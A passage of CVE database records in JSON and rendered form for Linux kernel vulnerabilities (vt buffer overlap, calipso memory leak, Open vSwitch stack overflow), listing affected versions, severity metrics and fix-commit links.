"url": "https://git.kernel.org/stable/c/b33a81e4ecfb022b028cae37d1c1ce28ac1b359d"
},
{
"url": "https://git.kernel.org/stable/c/beeed260b92af158592f5e8d2dab65dae45c6f70"
},
{
"url": "https://git.kernel.org/stable/c/7bbf76c9bb2c58375e183074e44f9712483f0603"
},
{
"url": "https://git.kernel.org/stable/c/e120b6388d7d88635d67dcae6483f39c37111850"
}
],
"title": "wifi: ar5523: enable proper endpoint verification",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38565",
"datePublished": "2024-06-19T13:35:32.920Z",
"dateReserved": "2024-06-18T19:36:34.923Z",
"dateUpdated": "2025-11-04T17:21:29.789Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2022-48627 (GCVE-0-2022-48627)
Vulnerability from cvelistv5
Published
2024-03-02 21:31
Modified
2025-05-04 08:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vt: fix memory overlapping when deleting chars in the buffer
A memory overlapping copy occurs when deleting a long line. This memory
overlapping copy can cause data corruption when scr_memcpyw is optimized
to memcpy because memcpy does not ensure its behavior if the destination
buffer overlaps with the source buffer. The line buffer is not always
broken, because the memcpy utilizes the hardware acceleration, whose
result is not deterministic.
Fix this problem by using replacing the scr_memcpyw with scr_memmovew.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-48627",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-12T14:23:17.504508Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-16T16:04:55.670Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:17:55.441Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c8686c014b5e872ba7e334f33ca553f14446fc29"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/815be99d934e3292906536275f2b8d5131cdf52c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bfee93c9a6c395f9aa62268f1cedf64999844926"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/57964a5710252bc82fe22d9fa98c180c58c20244"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/14d2cc21ca622310babf373e3a8f0b40acfe8265"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/39cdb68c64d84e71a4a717000b6e5de208ee60cc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/vt/vt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c8686c014b5e872ba7e334f33ca553f14446fc29",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "815be99d934e3292906536275f2b8d5131cdf52c",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "bfee93c9a6c395f9aa62268f1cedf64999844926",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "57964a5710252bc82fe22d9fa98c180c58c20244",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "14d2cc21ca622310babf373e3a8f0b40acfe8265",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "39cdb68c64d84e71a4a717000b6e5de208ee60cc",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/vt/vt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.132",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.56",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.18.*",
"status": "unaffected",
"version": "5.18.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.19",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.132",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.56",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.18.13",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.19",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvt: fix memory overlapping when deleting chars in the buffer\n\nA memory overlapping copy occurs when deleting a long line. This memory\noverlapping copy can cause data corruption when scr_memcpyw is optimized\nto memcpy because memcpy does not ensure its behavior if the destination\nbuffer overlaps with the source buffer. The line buffer is not always\nbroken, because the memcpy utilizes the hardware acceleration, whose\nresult is not deterministic.\n\nFix this problem by using replacing the scr_memcpyw with scr_memmovew."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:20:02.253Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c8686c014b5e872ba7e334f33ca553f14446fc29"
},
{
"url": "https://git.kernel.org/stable/c/815be99d934e3292906536275f2b8d5131cdf52c"
},
{
"url": "https://git.kernel.org/stable/c/bfee93c9a6c395f9aa62268f1cedf64999844926"
},
{
"url": "https://git.kernel.org/stable/c/57964a5710252bc82fe22d9fa98c180c58c20244"
},
{
"url": "https://git.kernel.org/stable/c/14d2cc21ca622310babf373e3a8f0b40acfe8265"
},
{
"url": "https://git.kernel.org/stable/c/39cdb68c64d84e71a4a717000b6e5de208ee60cc"
}
],
"title": "vt: fix memory overlapping when deleting chars in the buffer",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48627",
"datePublished": "2024-03-02T21:31:48.383Z",
"dateReserved": "2024-02-25T13:44:28.314Z",
"dateUpdated": "2025-05-04T08:20:02.253Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52698 (GCVE-0-2023-52698)
Vulnerability from cvelistv5
Published
2024-05-17 14:27
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
calipso: fix memory leak in netlbl_calipso_add_pass()
If IPv6 support is disabled at boot (ipv6.disable=1),
the calipso_init() -> netlbl_calipso_ops_register() function isn't called,
and the netlbl_calipso_ops_get() function always returns NULL.
In this case, the netlbl_calipso_add_pass() function allocates memory
for the doi_def variable but doesn't free it with the calipso_doi_free().
BUG: memory leak
unreferenced object 0xffff888011d68180 (size 64):
comm "syz-executor.1", pid 10746, jiffies 4295410986 (age 17.928s)
hex dump (first 32 bytes):
00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace:
[<...>] kmalloc include/linux/slab.h:552 [inline]
[<...>] netlbl_calipso_add_pass net/netlabel/netlabel_calipso.c:76 [inline]
[<...>] netlbl_calipso_add+0x22e/0x4f0 net/netlabel/netlabel_calipso.c:111
[<...>] genl_family_rcv_msg_doit+0x22f/0x330 net/netlink/genetlink.c:739
[<...>] genl_family_rcv_msg net/netlink/genetlink.c:783 [inline]
[<...>] genl_rcv_msg+0x341/0x5a0 net/netlink/genetlink.c:800
[<...>] netlink_rcv_skb+0x14d/0x440 net/netlink/af_netlink.c:2515
[<...>] genl_rcv+0x29/0x40 net/netlink/genetlink.c:811
[<...>] netlink_unicast_kernel net/netlink/af_netlink.c:1313 [inline]
[<...>] netlink_unicast+0x54b/0x800 net/netlink/af_netlink.c:1339
[<...>] netlink_sendmsg+0x90a/0xdf0 net/netlink/af_netlink.c:1934
[<...>] sock_sendmsg_nosec net/socket.c:651 [inline]
[<...>] sock_sendmsg+0x157/0x190 net/socket.c:671
[<...>] ____sys_sendmsg+0x712/0x870 net/socket.c:2342
[<...>] ___sys_sendmsg+0xf8/0x170 net/socket.c:2396
[<...>] __sys_sendmsg+0xea/0x1b0 net/socket.c:2429
[<...>] do_syscall_64+0x30/0x40 arch/x86/entry/common.c:46
[<...>] entry_SYSCALL_64_after_hwframe+0x61/0xc6
Found by InfoTeCS on behalf of Linux Verification Center
(linuxtesting.org) with Syzkaller
[PM: merged via the LSM tree at Jakub Kicinski request]
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: cb72d38211eacda2dd90b09540542b6582da614e Version: cb72d38211eacda2dd90b09540542b6582da614e Version: cb72d38211eacda2dd90b09540542b6582da614e Version: cb72d38211eacda2dd90b09540542b6582da614e Version: cb72d38211eacda2dd90b09540542b6582da614e Version: cb72d38211eacda2dd90b09540542b6582da614e Version: cb72d38211eacda2dd90b09540542b6582da614e Version: cb72d38211eacda2dd90b09540542b6582da614e |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52698",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T15:13:30.543415Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T15:13:41.633Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:34.958Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a8f811a146aa2a0230f8edb2e9f4b6609aab8da"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36e19f84634aaa94f543fedc0a07588949638d53"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/44a88650ba55e6a7f2ec485d2c2413ba7e216f01"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a4529a08d3704c17ea9c7277d180e46b99250ded"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/321b3a5592c8a9d6b654c7c64833ea67dbb33149"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/408bbd1e1746fe33e51f4c81c2febd7d3841d031"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f14d36e6e97fe935a20e0ceb159c100f90b6627c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec4e9d630a64df500641892f4e259e8149594a99"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netlabel/netlabel_calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9a8f811a146aa2a0230f8edb2e9f4b6609aab8da",
"status": "affected",
"version": "cb72d38211eacda2dd90b09540542b6582da614e",
"versionType": "git"
},
{
"lessThan": "36e19f84634aaa94f543fedc0a07588949638d53",
"status": "affected",
"version": "cb72d38211eacda2dd90b09540542b6582da614e",
"versionType": "git"
},
{
"lessThan": "44a88650ba55e6a7f2ec485d2c2413ba7e216f01",
"status": "affected",
"version": "cb72d38211eacda2dd90b09540542b6582da614e",
"versionType": "git"
},
{
"lessThan": "a4529a08d3704c17ea9c7277d180e46b99250ded",
"status": "affected",
"version": "cb72d38211eacda2dd90b09540542b6582da614e",
"versionType": "git"
},
{
"lessThan": "321b3a5592c8a9d6b654c7c64833ea67dbb33149",
"status": "affected",
"version": "cb72d38211eacda2dd90b09540542b6582da614e",
"versionType": "git"
},
{
"lessThan": "408bbd1e1746fe33e51f4c81c2febd7d3841d031",
"status": "affected",
"version": "cb72d38211eacda2dd90b09540542b6582da614e",
"versionType": "git"
},
{
"lessThan": "f14d36e6e97fe935a20e0ceb159c100f90b6627c",
"status": "affected",
"version": "cb72d38211eacda2dd90b09540542b6582da614e",
"versionType": "git"
},
{
"lessThan": "ec4e9d630a64df500641892f4e259e8149594a99",
"status": "affected",
"version": "cb72d38211eacda2dd90b09540542b6582da614e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netlabel/netlabel_calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncalipso: fix memory leak in netlbl_calipso_add_pass()\n\nIf IPv6 support is disabled at boot (ipv6.disable=1),\nthe calipso_init() -\u003e netlbl_calipso_ops_register() function isn\u0027t called,\nand the netlbl_calipso_ops_get() function always returns NULL.\nIn this case, the netlbl_calipso_add_pass() function allocates memory\nfor the doi_def variable but doesn\u0027t free it with the calipso_doi_free().\n\nBUG: memory leak\nunreferenced object 0xffff888011d68180 (size 64):\n comm \"syz-executor.1\", pid 10746, jiffies 4295410986 (age 17.928s)\n hex dump (first 32 bytes):\n 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace:\n [\u003c...\u003e] kmalloc include/linux/slab.h:552 [inline]\n [\u003c...\u003e] netlbl_calipso_add_pass net/netlabel/netlabel_calipso.c:76 [inline]\n [\u003c...\u003e] netlbl_calipso_add+0x22e/0x4f0 net/netlabel/netlabel_calipso.c:111\n [\u003c...\u003e] genl_family_rcv_msg_doit+0x22f/0x330 net/netlink/genetlink.c:739\n [\u003c...\u003e] genl_family_rcv_msg net/netlink/genetlink.c:783 [inline]\n [\u003c...\u003e] genl_rcv_msg+0x341/0x5a0 net/netlink/genetlink.c:800\n [\u003c...\u003e] netlink_rcv_skb+0x14d/0x440 net/netlink/af_netlink.c:2515\n [\u003c...\u003e] genl_rcv+0x29/0x40 net/netlink/genetlink.c:811\n [\u003c...\u003e] netlink_unicast_kernel net/netlink/af_netlink.c:1313 [inline]\n [\u003c...\u003e] netlink_unicast+0x54b/0x800 net/netlink/af_netlink.c:1339\n [\u003c...\u003e] netlink_sendmsg+0x90a/0xdf0 net/netlink/af_netlink.c:1934\n [\u003c...\u003e] sock_sendmsg_nosec net/socket.c:651 [inline]\n [\u003c...\u003e] sock_sendmsg+0x157/0x190 net/socket.c:671\n [\u003c...\u003e] ____sys_sendmsg+0x712/0x870 net/socket.c:2342\n [\u003c...\u003e] ___sys_sendmsg+0xf8/0x170 net/socket.c:2396\n [\u003c...\u003e] __sys_sendmsg+0xea/0x1b0 net/socket.c:2429\n [\u003c...\u003e] do_syscall_64+0x30/0x40 arch/x86/entry/common.c:46\n [\u003c...\u003e] entry_SYSCALL_64_after_hwframe+0x61/0xc6\n\nFound by InfoTeCS on behalf of Linux Verification Center\n(linuxtesting.org) with Syzkaller\n\n[PM: merged via the LSM tree at Jakub Kicinski request]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:51.813Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9a8f811a146aa2a0230f8edb2e9f4b6609aab8da"
},
{
"url": "https://git.kernel.org/stable/c/36e19f84634aaa94f543fedc0a07588949638d53"
},
{
"url": "https://git.kernel.org/stable/c/44a88650ba55e6a7f2ec485d2c2413ba7e216f01"
},
{
"url": "https://git.kernel.org/stable/c/a4529a08d3704c17ea9c7277d180e46b99250ded"
},
{
"url": "https://git.kernel.org/stable/c/321b3a5592c8a9d6b654c7c64833ea67dbb33149"
},
{
"url": "https://git.kernel.org/stable/c/408bbd1e1746fe33e51f4c81c2febd7d3841d031"
},
{
"url": "https://git.kernel.org/stable/c/f14d36e6e97fe935a20e0ceb159c100f90b6627c"
},
{
"url": "https://git.kernel.org/stable/c/ec4e9d630a64df500641892f4e259e8149594a99"
}
],
"title": "calipso: fix memory leak in netlbl_calipso_add_pass()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52698",
"datePublished": "2024-05-17T14:27:29.885Z",
"dateReserved": "2024-03-07T14:49:46.889Z",
"dateUpdated": "2025-05-04T07:41:51.813Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-1151 (GCVE-0-2024-1151)
Vulnerability from cvelistv5
Published
2024-02-11 14:29
Modified
2025-11-07 15:28
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-121 - Stack-based Buffer Overflow
Summary
A vulnerability was reported in the Open vSwitch sub-component in the Linux Kernel. The flaw occurs when a recursive operation of code push recursively calls into the code block. The OVS module does not validate the stack depth, pushing too many frames and causing a stack overflow. As a result, this can lead to a crash or other related issues.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 9 |
Unaffected: 0:5.14.0-503.11.1.el9_5 < * cpe:/a:redhat:enterprise_linux:9::crb cpe:/a:redhat:enterprise_linux:9::nfv cpe:/a:redhat:enterprise_linux:9::appstream cpe:/a:redhat:enterprise_linux:9::realtime cpe:/o:redhat:enterprise_linux:9::baseos |
|||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-1151",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-12T14:32:05.476230Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:42.253Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:26:30.497Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:4823",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4823"
},
{
"name": "RHSA-2024:4831",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4831"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-1151"
},
{
"name": "RHBZ#2262241",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262241"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3LZROQAX7Q7LEP4F7WQ3KUZKWCZGFFP2/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GS7S3XLTLOUKBXV67LLFZWB3YVFJZHRK/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/all/20240207132416.1488485-1-aconole@redhat.com/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-503.11.1.el9_5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-503.11.1.el9_5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::appstream",
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.75.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::nfv",
"cpe:/a:redhat:rhel_eus:9.2::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.75.1.rt14.360.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel",
